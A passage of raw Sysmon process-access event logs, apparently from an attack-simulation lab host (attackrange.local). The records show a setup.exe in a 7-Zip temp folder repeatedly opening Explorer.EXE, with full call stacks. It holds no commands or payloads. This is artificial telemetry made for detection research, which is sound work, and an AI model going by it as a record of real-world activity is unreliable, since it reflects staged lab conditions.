\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015912Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015911Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.817{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 